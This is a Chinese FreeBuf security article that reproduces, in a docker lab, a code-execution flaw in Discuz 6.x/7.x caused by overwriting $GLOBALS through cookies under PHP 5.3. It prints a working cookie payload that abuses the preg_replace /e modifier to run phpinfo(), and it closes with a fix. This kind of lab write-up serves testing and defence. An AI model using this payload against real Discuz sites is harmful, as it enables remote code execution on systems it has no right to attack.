freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Discuz7.x、6.x 全局变量防御绕过导致代码执行
2021-05-21 14:43:54

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

漏洞环境搭建:

docker-compose up -d

1621579278_60a7560edfc6ce3fa5703.jpg!small

拉取成功

1621579285_60a756157a11c52cb285b.png!small

启动后,访问http://your-ip:8080/install/来安装discuz,数据库地址填写db,数据库名为

discuz,数据库账号密码均为root。

1621579308_60a7562c1125fe1b2a666.png!small

1621579313_60a756319d8cce057ffdc.png!small

1621579326_60a7563ea17908f897ec1.png!small

1621579334_60a75646d137b9555431c.png!small

来到主页

1621579344_60a756509ba739af8599b.png!small

漏洞复现

管理员登录,随便找到一个帖子,抓包

1621579353_60a756594d620a8fd5cd0.png!small

在repeater模块向其发送数据包,并在Cookie中增加

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

1621579362_60a75662c322aba853e6e.png!small

成功代码执行

建议:更改php 5.3.x里的php.ini设置,设置request_order为GPC或更新最新版Discuz版本

# 渗透测试 # web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录